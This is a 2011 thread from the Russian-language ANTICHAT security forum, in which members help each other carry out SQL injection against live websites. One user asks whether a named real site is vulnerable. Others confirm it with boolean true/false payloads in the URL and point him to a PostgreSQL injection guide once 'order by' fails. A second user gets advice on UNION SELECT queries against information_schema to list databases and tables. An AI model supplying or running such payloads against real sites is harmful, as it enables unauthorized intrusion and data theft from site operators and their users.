HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18741  
Старый 03.12.2011, 02:45
lightangel
Guest
Сообщений: n/a
Провел на форуме:
35174

Репутация: -6
По умолчанию

Is this really vulnerable?

Код:
Code:
http://www.gomlab.com/eng/forum.html?mode=announceView&a=125%27&no=
I've tried all attempts on it.
 
Ответить с цитированием

  #18742  
Старый 03.12.2011, 02:51
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от shadowrun  
shadowrun said:
Колонок столько. Это сообщение выводиться в теле сайта, который загрузился (с контентом). А когда число колонок не подходит, сайт не загружается а только эррор маскуеля (на белом фоне черный текст ошибки).
Там несколько последующих запросов просто.

Выводи в ошибке, или же ищи вывод первого запроса.
 
Ответить с цитированием

  #18743  
Старый 03.12.2011, 08:37
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от lightangel  
lightangel said:
Is this really vulnerable?
Код:
Code:
http://www.gomlab.com/eng/forum.html?mode=announceView&a=125%27&no=
I've tried all attempts on it.
Код:
Code:
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1  TRUE

http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2  FALSE
Yes, this is vulnerable
 
Ответить с цитированием

  #18744  
Старый 03.12.2011, 13:38
lightangel
Guest
Сообщений: n/a
Провел на форуме:
35174

Репутация: -6
По умолчанию

Sure. Well the problem is, I can't get order by or group by.

Can you just help a bit further?
 
Ответить с цитированием

  #18745  
Старый 03.12.2011, 13:44
A_n_d_r_e_i
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
Провел на форуме:
3426765

Репутация: 257
Отправить сообщение для A_n_d_r_e_i с помощью ICQ
По умолчанию

Цитата:
Сообщение от lightangel  
lightangel said:
Sure. Well the problem is, I can't get order by or group by.
Can you just help a bit further?
Yes, we can help if you write the url, where you "can't get order by or group by"
 
Ответить с цитированием

  #18746  
Старый 03.12.2011, 13:53
lightangel
Guest
Сообщений: n/a
Провел на форуме:
35174

Репутация: -6
По умолчанию

Thanks sir.

Код:
Code:
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1  TRUE

http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2  FALSE
I tried http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1(ord er by and string based= nothing works)

http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2 FALSE(order by and string based= nothing works)

Any help now? Thanks.
 
Ответить с цитированием

  #18747  
Старый 03.12.2011, 14:12
A_n_d_r_e_i
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
Провел на форуме:
3426765

Репутация: 257
Отправить сообщение для A_n_d_r_e_i с помощью ICQ
По умолчанию

Цитата:
Сообщение от lightangel  
lightangel said:
Thanks sir.
Код:
Code:
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1  TRUE

http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2  FALSE
I tried http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1(ord er by and string based= nothing works)
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2 FALSE(order by and string based= nothing works)
Any help now? Thanks.
SQL-Injection in PostgreSQL DB

Part 2
 
Ответить с цитированием

  #18748  
Старый 03.12.2011, 14:17
lightangel
Guest
Сообщений: n/a
Провел на форуме:
35174

Репутация: -6
По умолчанию

Well received, thank you.
 
Ответить с цитированием

  #18749  
Старый 03.12.2011, 17:59
Goodwin_
Новичок
Регистрация: 29.05.2008
Сообщений: 11
Провел на форуме:
397307

Репутация: 10
По умолчанию

подскажите, вот есть запрос:

Цитата:
Сообщение от None  
+union+select+1,table_name,3+from+information_sche ma.tables
показывает имена всех таблиц.

такой запрос:

Цитата:
Сообщение от None  
+union+select+1,table_schema,3+from+information_sc hema.tables+where+table_name=0x0000
покажет имена баз данных в которых есть таблица с именем 0х0000?

ок, например после последнего запроса вывелось несколько имён баз данных. как получить имена таблиц из каждой по отдельности?
 
Ответить с цитированием

  #18750  
Старый 03.12.2011, 18:05
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Goodwin_  
Goodwin_ said:
подскажите, вот есть запрос:
показывает имена всех таблиц.
такой запрос:
покажет имена баз данных в которых есть таблица с именем 0х0000?
ок, например после последнего запроса вывелось несколько имён баз данных. как получить имена таблиц из каждой по отдельности?
where table name='имя таблицы' and table_schema='имя_базы'

пора уже взятся за учебник SQL..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ